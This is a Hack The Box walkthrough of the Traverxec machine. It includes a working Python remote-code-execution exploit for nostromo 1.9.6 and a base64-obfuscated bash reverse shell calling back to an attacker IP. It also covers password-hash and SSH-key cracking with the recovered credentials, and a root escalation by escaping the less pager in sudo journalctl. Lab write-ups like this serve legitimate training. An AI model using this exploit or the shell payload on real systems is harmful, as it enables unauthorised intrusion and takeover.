# Traverxec - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Traverxec was an awesome, easy-rated HTB machine created by [jkr](https://twitter.com/ateamjkr)

For foothold, we exploit a vulnerability in `nostromo 1.9.6`  
For user, we exploit `homedirs_public` option in `nhttpd.conf` to access private files.  
And finally, we break out from `less` pager in `journalctl` by spawning an interactive system shell.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.096s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN traverxec.nmap 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.13s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-title: TRAVERXEC
|_http-server-header: nostromo 1.9.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The usual SSH (22) and HTTP (80) ports are exposed.

Visiting <http://10.10.10.165/> in a browser, we'd get:

![1](images/1.png)

I tried enumerated routes with `ffuf`:

```console
opcode@parrot$ ffuf -c -w ~/cybersec/wordlists/raft-small-words.txt -u http://10.10.10.165/FUZZ -mc all -fs 298 2>/dev/null
js                      [Status: 301, Size: 314, Words: 19, Lines: 14, Duration: 120ms]
css                     [Status: 301, Size: 314, Words: 19, Lines: 14, Duration: 116ms]
img                     [Status: 301, Size: 314, Words: 19, Lines: 14, Duration: 132ms]
lib                     [Status: 301, Size: 314, Words: 19, Lines: 14, Duration: 108ms]
.                       [Status: 301, Size: 314, Words: 19, Lines: 14, Duration: 100ms]
icons                   [Status: 301, Size: 314, Words: 19, Lines: 14, Duration: 94ms]
```

Visiting `/img`, we'd learn that directory listing is enabled:

![2](images/2.png)

The directory listing inside `/lib` lists a bunch of libraries, but they all seem to be standard frontend libraries.

## Remote Code Execution in `nostromo 1.9.6`

In `burp`, if we look at the response headers, we'd notice something odd:

```console
opcode@parrot$ curl -I http://10.10.10.165
HTTP/1.1 200 OK
Date: Fri, 11 Aug 2023 12:35:19 GMT
Server: nostromo 1.9.6
Connection: close
Last-Modified: Fri, 25 Oct 2019 21:11:09 GMT
Content-Length: 15674
Content-Type: text/html
```

The `Server` header is set to `nostromo 1.9.6`. `nostromo` is an open-source web server.  
Googling for "nostromo 1.9.6 exploit", we'd learn that it has an RCE vulnerability.  
The [PoC](https://www.exploit-db.com/exploits/47837) is available on exploit-db. Sadly, it is written in `python2`  

It is possible to replicate it in python3, [run_commands.py](run_commands.py):

```py
import socket
import sys


def do_post(host, path, body):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, 80))

    crlf = b"\r\n"
    method = b"POST"
    protocol = b"HTTP/1.0"
    host_header = b"Host: " + host.encode()
    length_header = b"Content-Length: 1"
    path = path.encode()

    s.send(
        method + b" " + path + b" " + protocol + crlf +
        host_header + crlf +
        length_header + crlf + crlf +
        body
    )

    response = b""
    while True:
        data = s.recv(4096)
        if not data:
            break
        response += data

    return response.split(b"\r\n")[-1].decode()


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"[-] Usage: python3 {sys.argv[0]} <host> <cmd>")
        print(f"[-] Example: python3 {sys.argv[0]} 10.10.10.165 'id'\n")
        sys.exit()

    rhost = sys.argv[1]
    cmd = sys.argv[2]
    path = "/.%0d./.%0d./.%0d./.%0d./bin/sh"
    body = b"echo\necho\n" + cmd.encode() + b" 2>&1"

    result = do_post(rhost, path, body)
    print(result)
```

```console
opcode@parrot$ python3 run_commands.py 10.10.10.165 'id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

To get a reverse shell, I ran:

```console
opcode@parrot$ python3 run_commands.py 10.10.10.165 'echo YmFzaCAtYyAnYmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTQ3LzkwMDEgMD4mMScK | base64 -d | bash'
```

We can stabilize the shell first:

```console
www-data@traverxec:/tmp$ python3 -c 'import pty;pty.spawn("/bin/bash");'
www-data@traverxec:/tmp$ ^Z
opcode@parrot$ stty raw -echo; fg
www-data@traverxec:/tmp$ export TERM=xterm-256color
www-data@traverxec:/tmp$ exec /bin/bash
```

## Post-foothold enumeration

We can run `linpeas.sh` on the box.  
It would find lots of unintended kernel exploits first.

It also finds a `.htpasswd` file:

```console
www-data@traverxec:/tmp$ cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
```

We can try to crack it with `john`:

```console
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

It cracked:

```text
Nowonly4me       (david)
```

I tested for password reuse on user `david`, but it didn't work.  
Inside `/var/nostromo/conf`, we also have:

```console
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf 
# MAIN [MANDATORY]

servername      traverxec.htb
serverlisten        *
serveradmin     david@traverxec.htb
serverroot      /var/nostromo
servermimes     conf/mimes
docroot         /var/nostromo/htdocs
docindex        index.html

# LOGS [OPTIONAL]

logpid          logs/nhttpd.pid

# SETUID [RECOMMENDED]

user            www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess        .htaccess
htpasswd        /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons          /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs        /home
homedirs_public     public_www
```

I tried googling "nostromo admin panel" but found nothing useful.  
Instead, when going through the [manual](https://www.gsp.com/cgi-bin/man.cgi?section=8&topic=NHTTPD), I found:

```text
HOMEDIRS
To serve the home directories of your users via HTTP, enable the homedirs option by defining the path in where the home directories are stored, normally `/home`. To access a users home directory enter a ~ in the URL followed by the home directory name like in this example:
http://www.nazgul.ch/~hacki/
```

Therefore, I tried visiting <http://10.10.10.165/~david/>, but it only says:

```text
Private space.
Nothing here.
Keep out!
```

I also tried `curl` with `Authorization` header, but it failed as expected:

```console
opcode@parrot$ curl -H 'Authorization: Basic ZGF2aWQ6Tm93b25seTRtZQ==' 'http://10.10.10.165/~david/'
```

I found another helpful line in the manual:

```text
You can restrict the access within the home directories to a single sub directory by defining it via the `homedirs_public` option.
```

This results in a fun interaction:

```console
www-data@traverxec:/home$ ls -la /home/david/
ls: cannot open directory '/home/david/': Permission denied
www-data@traverxec:/home$ ls -la /home/david/public_www/
total 16
drwxr-xr-x 3 david david 4096 Oct 25  2019 .
drwx--x--x 5 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david  402 Oct 25  2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25  2019 protected-file-area
```

In the `protected-file-area`, we have:

```console
www-data@traverxec:/home$ ls -la /home/david/public_www/protected-file-area
total 16
drwxr-xr-x 2 david david 4096 Oct 25  2019 .
drwxr-xr-x 3 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david   45 Oct 25  2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25  2019 backup-ssh-identity-files.tgz
```

We can also access it from <http://10.10.10.165/~david/protected-file-area/> and use credentials `david:Nowonly4me`

We can unzip this file:

```console
opcode@parrot$ tar -xvf backup-ssh-identity-files.tgz           
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
```

We should be able to use this `id_rsa` to SSH to the box as `david`.

```console
opcode@parrot$ chmod 600 id_rsa
opcode@parrot$ ssh -i id_rsa david@10.10.10.165
```

I was asked for a passphrase for `id_rsa`. We need to crack it.  
But first, we need to use <https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py>

```console
opcode@parrot$ python3 ssh2john.py id_rsa > hash
opcode@parrot$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

It cracks:

```text
hunter           (id_rsa)
```

We can now SSH to the box:

```console
opcode@parrot$ ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa': hunter
```

## Abusing `less` pager to get interactive shell

In `david`'s home, a `bin` directory exists:

```console
david@traverxec:~/bin$ ls -la
total 16
drwx------ 2 david david 4096 Aug 12 13:02 .
drwx--x--x 6 david david 4096 Aug 12 16:10 ..
-r-------- 1 david david  802 Oct 25  2019 server-stats.head
-rwx------ 1 david david  363 Oct 25  2019 server-stats.sh
```

```console
david@traverxec:~/bin$ cat server-stats.head 
                                                                          .----.
                                                              .---------. | == |
   Webserver Statistics and Data                              |.-"""""-.| |----|
         Collection Script                                    ||       || | == |
          (c) David, 2019                                     ||       || |----|
                                                              |'-.....-'| |::::|
                                                              '"")---(""' |___.|
                                                             /:::::::::::\"    "
                                                            /:::=======:::\
                                                        jgs '"""""""""""""' 

david@traverxec:~/bin$ cat server-stats.sh 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 
```

This script is running `journalctl` as `sudo`.  
When I ran the script, it worked without any errors. Perhaps a `journalctl` rule favorable to `david` is present in `/etc/sudoers`?  
We cannot verify this claim as both the obtained passwords do not work with `sudo -l`  
But we can try running the command:

```console
david@traverxec:~$ sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Fri 2023-08-11 02:00:33 EDT, end at Sun 2023-08-13 10:52:14 EDT. --
Aug 12 12:34:04 traverxec sudo[32408]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/2 ruser=www-data rhost=  user=www-data
Aug 12 12:34:05 traverxec sudo[32408]: pam_unix(sudo:auth): conversation failed
Aug 12 12:34:05 traverxec sudo[32408]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Aug 12 12:34:05 traverxec sudo[32408]: www-data : command not allowed ; TTY=pts/2 ; PWD=/tmp ; USER=root ; COMMAND=list
Aug 12 12:34:05 traverxec nologin[32451]: Attempted login by UNKNOWN on UNKNOWN
```

I'm solving this box in August of 2023, and I already had an inkling of the privesc thanks to this tweet.

![3](images/3.png)

Therefore, we can make the terminal small, run this command, and trigger root shell with `!sh`  
This way, I was able to get a shell as root:

```console
# id
uid=0(root) gid=0(root) groups=0(root)
```
